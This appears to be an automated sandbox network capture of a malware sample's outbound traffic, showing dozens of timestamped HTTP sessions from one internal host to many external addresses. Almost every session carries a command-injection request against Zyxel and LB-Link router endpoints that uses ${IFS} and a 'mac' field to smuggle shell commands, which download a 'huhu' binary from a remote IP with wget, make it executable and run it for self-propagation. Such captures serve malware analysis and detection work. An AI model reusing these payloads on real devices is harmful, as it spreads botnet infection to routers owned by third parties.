                                                Jan 29, 2024 07:07:59.573322058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7338192.168.2.2344166212.233.203.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.573359966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7339192.168.2.235769883.77.81.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.573410988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7340192.168.2.2340178124.55.209.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.573431015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7341192.168.2.235514237.27.74.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.573458910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7342192.168.2.2358886172.203.161.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.573498964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7343192.168.2.2354520104.24.19.2278080
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.245439053 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                Jan 29, 2024 07:08:00.362462997 CET328INHTTP/1.1 400 Bad Request
                                                Server: cloudflare
                                                Date: Mon, 29 Jan 2024 06:08:00 GMT
                                                Content-Type: text/html
                                                Content-Length: 155
                                                Connection: close
                                                CF-RAY: -
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7344192.168.2.235138862.74.253.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.584908962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7345192.168.2.2357050199.15.144.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.584937096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7346192.168.2.234077261.161.237.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.585004091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7347192.168.2.2359340189.114.158.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.585067034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7348192.168.2.2334224221.99.173.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.585073948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7349192.168.2.2333288146.14.16.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.585124969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7350192.168.2.2354214184.50.172.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.585163116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7351192.168.2.235340014.210.107.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.585201979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7352192.168.2.235558665.61.206.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.585257053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7353192.168.2.2333900160.202.121.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.585297108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7354192.168.2.2333360170.52.251.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.585386992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7355192.168.2.23343885.221.228.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.585388899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7356192.168.2.2355424197.40.16.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.585397959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7357192.168.2.2357412186.170.214.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.585408926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7358192.168.2.233587252.75.185.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.585475922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7359192.168.2.2350516147.77.6.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.585534096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7360192.168.2.2349808195.201.171.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.585571051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7361192.168.2.233541257.67.233.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.585597038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7362192.168.2.235336260.16.113.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.585630894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7363192.168.2.2345454221.20.110.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.585669041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7364192.168.2.234084434.17.242.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.585715055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7365192.168.2.2348028108.15.69.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.585753918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7366192.168.2.2348492121.137.101.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.585788012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7367192.168.2.2355084222.26.148.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.585835934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7368192.168.2.2344038221.72.85.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.585895061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7369192.168.2.2342408184.76.40.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.585917950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7370192.168.2.234644083.108.128.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.585973978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7371192.168.2.235136693.90.201.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.585994005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7372192.168.2.2345238120.157.200.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.586050987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7373192.168.2.233359014.224.236.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.586093903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7374192.168.2.233878643.127.196.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.586133003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7375192.168.2.2341648123.255.117.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.586165905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7376192.168.2.2343190222.232.224.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.586205959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7377192.168.2.2358670134.144.255.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.586242914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7378192.168.2.2339088159.250.74.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.586293936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7379192.168.2.2341300208.32.46.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.586328030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7380192.168.2.234182081.179.50.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.586364031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7381192.168.2.2360214182.194.249.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.586421967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7382192.168.2.2358726151.216.196.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.586447001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7383192.168.2.235244027.150.227.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.586502075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7384192.168.2.2339040183.133.74.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.586550951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7385192.168.2.2342924190.85.214.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.586595058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7386192.168.2.2357158115.203.227.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.586625099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7387192.168.2.2348706104.206.121.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.586666107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7388192.168.2.235839651.81.98.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.586719036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7389192.168.2.233939435.250.93.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.586779118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7390192.168.2.2352002109.70.27.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.586826086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7391192.168.2.236019662.14.37.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.586846113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7392192.168.2.236001486.170.175.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.586901903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7393192.168.2.234749650.63.3.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.586951971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7394192.168.2.2333684156.10.252.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.586993933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7395192.168.2.234600699.244.51.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.587042093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7396192.168.2.233644693.227.189.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.587074041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7397192.168.2.2345912131.20.115.180443
